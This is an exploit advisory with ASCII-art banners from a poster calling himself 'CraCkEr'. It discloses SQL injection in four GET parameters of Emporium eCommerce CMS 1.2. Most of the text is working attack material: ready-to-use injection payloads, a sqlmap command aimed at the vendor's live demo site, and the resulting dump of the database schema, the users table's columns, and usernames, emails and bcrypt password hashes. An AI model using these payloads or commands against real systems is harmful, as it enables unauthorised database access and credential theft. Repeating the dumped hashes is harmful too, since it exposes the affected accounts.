Emporium eCommerce Online Shopping CMS 1.2 SQL Injection

`┌┌────────────────────────────────────────────────────────────────────────────────────┐  
││ C r a C k E r ┌┘  
┌┘ T H E C R A C K O F E T E R N A L M I G H T ││  
└────────────────────────────────────────────────────────────────────────────────────┘┘  
  
┌──── From The Ashes and Dust Rises An Unimaginable crack.... ────┐  
┌┌────────────────────────────────────────────────────────────────────────────────────┐  
┌┘ [ Exploits ] ┌┘  
└────────────────────────────────────────────────────────────────────────────────────┘┘  
: Author : CraCkEr │ │ :  
│ Website : mybizcms.com │ │ │  
│ Vendor : mybizcms │ │ │  
│ Software : Emporium eCommerce - │ │ │  
│ Online Shopping CMS v 1.2 │ │ Emporium eCommerce │  
│ Vuln Type: Remote SQL Injection │ │ │  
│ Method : GET │ │ is a complete online │  
│ Critical : High [░░▒▒▓▓██] │ │ shopping platform for all your needs │  
│ Impact : Database Access │ │ │  
│ │ │ │  
│ ────────────────────────────────────────┘ └─────────────────────────────────────────│  
│ B4nks-NET irc.b4nks.tk #unix ┌┘  
└────────────────────────────────────────────────────────────────────────────────────┘┘  
: :  
│ Release Notes: │  
│ ═════════════ │  
│ Typically used for remotely exploitable vulnerabilities that can lead to │  
│ system compromise. │  
│ │  
┌┌────────────────────────────────────────────────────────────────────────────────────┐  
┌┘ ┌┘  
└────────────────────────────────────────────────────────────────────────────────────┘┘  
  
Greets:  
Phr33k , NK, GoldenX, Wehla, Cap, ZARAGAGA, DarkCatSpace, R0ot, KnG, Centerk  
loool, DevS, Dark-Gost  
CryptoJob (Twitter) twitter.com/CryptozJob  
┌┌────────────────────────────────────────────────────────────────────────────────────┐  
┌┘ © CraCkEr 2022 ┌┘  
└────────────────────────────────────────────────────────────────────────────────────┘┘  
  
There's 4 parameters Vulnerable to SQL Injection in /categories/other-categories?  
  
  
GET parameter 'min_price' is vulnerable  
  
---  
Parameter: min_price (GET)  
Type: error-based  
Title: MySQL >= 5.1 error-based - Parameter replace (UPDATEXML)  
Payload: min_price=(UPDATEXML(5880,CONCAT(0x2e,0x7176787a71,(SELECT (ELT(5880=5880,1))),0x716b707071),2936))&max_price=145000&storage[]=41  
  
Type: time-based blind  
Title: MySQL >= 5.0.12 time-based blind - Parameter replace (substraction)  
Payload: min_price=(SELECT 3031 FROM (SELECT(SLEEP(5)))qWqF)&max_price=145000&storage[]=41  
---  
  
GET parameter 'percentage' is vulnerable.  
  
---  
Parameter: percentage (GET)  
Type: boolean-based blind  
Title: MySQL boolean-based blind - Parameter replace (MAKE_SET)  
Payload: percentage=MAKE_SET(4728=4728,5649)  
  
Type: error-based  
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)  
Payload: percentage=40 AND (SELECT 8890 FROM(SELECT COUNT(*),CONCAT(0x7170706b71,(SELECT (ELT(8890=8890,1))),0x717a707671,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)  
  
Type: time-based blind  
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)  
Payload: percentage=40 AND (SELECT 9724 FROM (SELECT(SLEEP(5)))chdS)  
---  
  
GET parameter 'review_ratings' is vulnerable  
  
---  
Parameter: review_ratings (GET)  
Type: error-based  
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)  
Payload: review_ratings=4 AND (SELECT 5450 FROM(SELECT COUNT(*),CONCAT(0x7170706b71,(SELECT (ELT(5450=5450,1))),0x717a707671,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)  
  
Type: time-based blind  
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)  
Payload: review_ratings=4 AND (SELECT 2340 FROM (SELECT(SLEEP(5)))lpXn)  
---  
  
GET parameter 'brand[]' is vulnerable  
  
---  
Parameter: brand[] (GET)  
Type: boolean-based blind  
Title: AND boolean-based blind - WHERE or HAVING clause  
Payload: brand[]=15') AND 3512=3512 AND ('Othl'='Othl  
  
Type: stacked queries  
Title: MySQL >= 5.0.12 stacked queries (comment)  
Payload: brand[]=15');SELECT SLEEP(5)#  
  
Type: time-based blind  
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)  
Payload: brand[]=15') AND (SELECT 9038 FROM (SELECT(SLEEP(5)))hyaE) AND ('KJgc'='KJgc  
---  
  
Live Demo Site:  
  
https://mybizcms.com/demos/multivendor/  
  
  
[+] Starting the Attack  
  
sqlmap.py -u "https://mybizcms.com/demos/multivendor/categories/other-categories?brand%5B%5D=15" --current-db --batch --random-agent  
  
[INFO] the back-end DBMS is MySQL  
web application technology: Apache, PHP 7.3.33, PHP  
back-end DBMS: MySQL >= 5.0 (MariaDB fork)  
[INFO] fetching current database  
current database: 'mybizcms_multivendor'  
  
  
fetching tables for database: 'mybizcms_multivendor'  
[101 tables]  
  
+--------------------------+  
| returns |  
| ad_placements |  
| addresses |  
| ads |  
| attribute_items |  
| attributes |  
| authorize_net_settings |  
| brands |  
| categories |  
| collections |  
| company |  
| counties |  
| countries |  
| credit_card_types |  
| cronjobs |  
| customers |  
| deliveries |  
| delivery_items |  
| delivery_options |  
| delivery_status |  
| discounts |  
| email_templates |  
| facebook_settings |  
| faqs |  
| flash_sale_items |  
| flash_sales |  
| flutterwave_settings |  
| github_settings |  
| google_settings |  
| item_status |  
| labels |  
| linkedin_settings |  
| logs |  
| media |  
| mpesa_settings |  
| newsletters |  
| notifications |  
| options |  
| order_details |  
| order_items |  
| order_status |  
| orders |  
| pages |  
| payment_options |  
| payment_status |  
| payments |  
| payout_modes |  
| payout_status |  
| payouts |  
| paypal_pro_settings |  
| paypal_standard_settings |  
| paytm_settings |  
| payu_money_settings |  
| permissions |  
| pesapal_settings |  
| pickup_stations |  
| post_categories |  
| post_comments |  
| posts |  
| product_attributes |  
| product_images |  
| product_reviews |  
| product_stock |  
| product_types |  
| product_variants |  
| product_wholesales |  
| products |  
| quicks |  
| return_reasons |  
| return_status |  
| rewards |  
| role_sub_permissions |  
| roles |  
| saved_items |  
| sessions |  
| shipping_fees |  
| shipping_regions |  
| shipping_weights |  
| shops |  
| sliders |  
| stripe_settings |  
| sub_permissions |  
| subscribers |  
| supported_currencies |  
| tags |  
| taxes |  
| temp_data |  
| ticket_priority |  
| ticket_replies |  
| ticket_status |  
| tickets |  
| timezones |  
| twitter_settings |  
| twocheckout_settings |  
| user_status |  
| user_sub_permissions |  
| users |  
| variant_choices |  
| variant_options |  
| wallets |  
| weights |  
+--------------------------+  
  
fetching columns for table 'users' in database 'mybizcms_multivendor'  
  
Table: users  
[34 columns]  
  
+------------------------+--------------+  
| Column | Type |  
+------------------------+--------------+  
| calling_code | varchar(11) |  
| city | varchar(100) |  
| company | varchar(100) |  
| country_id | int(11) |  
| date_added | datetime |  
| default_billing | int(11) |  
| default_currency | int(11) |  
| default_language | varchar(40) |  
| default_shipping | int(11) |  
| department_id | int(11) |  
| email | varchar(100) |  
| firstname | varchar(50) |  
| last_ip | varchar(40) |  
| last_login | datetime |  
| last_password_change | datetime |  
| lastname | varchar(50) |  
| latitude | varchar(300) |  
| longitude | varchar(300) |  
| new_pass_key_requested | datetime |  
| passkey | varchar(32) |  
| password | varchar(256) |  
| payout_address | longtext |  
| payout_mode_id | int(11) |  
| phone | varchar(30) |  
| postal_code | varchar(100) |  
| profile_image | varchar(150) |  
| role_id | int(11) |  
| state | varchar(50) |  
| street | varchar(100) |  
| user_id | int(11) |  
| user_status_id | int(11) |  
| user_uid | varchar(50) |  
| username | varchar(100) |  
| zip_code | varchar(15) |  
+------------------------+--------------+  
  
fetching entries of column(s) 'email,password,username' for table 'users' in database 'mybizcms_multivendor'  
  
Database: mybizcms_multivendor  
Table: users  
[7 entries]  
  
+----------+--------------------------------------------------------------+------------------------+  
| username | password | email |  
+----------+--------------------------------------------------------------+------------------------+  
| admin | $2y$10$G1DsE2VvjMDBFvozlWr.X.H1dq.UgNhTYSrMHGftuollcDDr9OA2m | [email protected] |  
| one | $2y$10$G1DsE2VvjMDBFvozlWr.X.H1dq.UgNhTYSrMHGftuollcDDr9OA2m | [email protected] |  
| two | $2y$10$K27UTI0KPeP.N.6EzxED6eVgU6jcAJDq8vf.EuCxzGSEFdSyI/oeC | [email protected] |  
| umuruviq | $2y$10$SID3yybe763.xosi8qwqkOTG8baLQQpIVdfrYzqG9dTPhcTtVL5Bu | [email protected] |  
| three | $2y$10$iBnMAPE.3FDeivo2kYPhSerMS05TmbIZQ/bLD6FcmvCowStICaaw. | [email protected] |  
| user | $2y$10$eZ0/eOZ5R.Mwju4nCqIgHuaVnBosugt8ADjwMCDzQP6oUUH2l5NVK | [email protected] |  
| tbjjrhls | $2y$10$XKA6hBkZlCAU3T7KcQm.7ubs06COQH4mCcGHmBMwzyYp016oBYoPe | [email protected] |  
+----------+--------------------------------------------------------------+------------------------+  
  
  
  
[-] Done  
`